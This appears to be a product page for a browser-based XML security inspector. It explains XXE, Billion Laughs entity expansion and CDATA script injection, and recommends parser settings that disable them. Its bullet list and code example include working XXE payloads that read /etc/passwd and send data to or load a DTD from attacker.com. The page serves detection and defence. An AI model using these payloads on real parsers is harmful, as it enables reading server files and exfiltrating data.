Inspecteur Sécurité XML

Détectez attaques XXE, injection DTD et bombes d'expansion dans les documents XML

Detecting XML Security Vulnerabilities

XML documents can contain constructs that, when processed by vulnerable parsers, enable severe attacks — from reading arbitrary files on the server (XXE) to denial-of-service through exponential entity expansion (Billion Laughs). These attacks exploit features that are part of the XML specification itself: external entities, DTD declarations, and entity expansion. The XML Security Inspector analyzes your XML documents to detect these dangerous constructs before they reach a vulnerable parser, identifying XXE attack patterns, DTD injection vectors, entity expansion bombs, and suspicious processing instructions.

Paste any XML document to receive a security analysis covering external entity references, internal DTD declarations, entity expansion depth, CDATA injection patterns, excessive nesting, and processing instruction abuse. Each finding explains the attack vector, its potential impact, and how to configure parsers to prevent exploitation. All analysis runs entirely in your browser.

XML External Entity (XXE) Detection

XXE attacks use external entity references to read server files or make network requests:

  • SYSTEM entities: <!ENTITY xxe SYSTEM "file:///etc/passwd"> reads local files
  • PUBLIC entities: <!ENTITY xxe PUBLIC "-//W3C//DTD" "http://attacker.com/steal"> makes outbound HTTP requests
  • Parameter entities: <!ENTITY % xxe SYSTEM "..."> used in DTD context for blind XXE
  • Remote DTD loading: <!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd"> loads external DTD definitions

The inspector flags any external entity reference — including both obvious attack patterns and legitimate-looking references that could be exploited if the XML reaches a server-side parser without proper configuration.

Entity Expansion and Billion Laughs

Entity expansion attacks create exponentially growing content from small inputs:

  • Billion Laughs: Nested entity definitions where each references the previous 10 times — 10 levels produces 10^10 (10 billion) expansions
  • Quadratic blowup: A single large entity referenced thousands of times fills memory linearly but with amplification
  • Recursive entities: Entities that reference themselves (causes infinite loops in some parsers)

The inspector calculates the theoretical expansion ratio of entity definitions and flags any document exceeding safe thresholds. Even 3-4 levels of nested entity expansion can consume gigabytes of memory in vulnerable parsers.

CDATA Injection and Processing Instructions

Additional attack vectors that the inspector detects:

  • CDATA with script content: <![CDATA[<script>alert(1)</script>]]> — when XML is transformed to HTML without proper escaping, CDATA content can inject scripts
  • Suspicious processing instructions: <?xml-stylesheet?> or custom PIs that may trigger server-side processing
  • Excessive nesting depth: Deeply nested elements that can cause stack overflow in recursive XML parsers
  • Namespace abuse: Extremely long namespace URIs or excessive namespace declarations used for memory exhaustion

These secondary attack vectors are often overlooked in security reviews that focus solely on XXE — they represent additional classes of XML-based attacks that security-conscious applications must defend against through proper parser configuration and input validation at the XML processing layer. The inspector produces a severity-rated finding for each detected pattern, enabling teams to prioritize remediation based on actual exploitation risk rather than theoretical vulnerability classifications.

Code Examples

XXE Attack Pattern Detection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY xxe2 SYSTEM "http://attacker.com/steal?data=">
]>
<userInfo>
  <name>&xxe;</name>
  <callback>&xxe2;</callback>
</userInfo>

<!-- Inspector findings:
  - CRITICAL: External SYSTEM entity "xxe" references local file (file:///etc/passwd)
  - CRITICAL: External SYSTEM entity "xxe2" makes outbound HTTP request
  - HIGH: DOCTYPE with internal DTD subset detected
  - Recommendation: Disable external entity processing in your XML parser:
    - Java: factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)
    - PHP: libxml_disable_entity_loader(true)
    - Python: defusedxml library instead of xml.etree
    - .NET: XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit
-->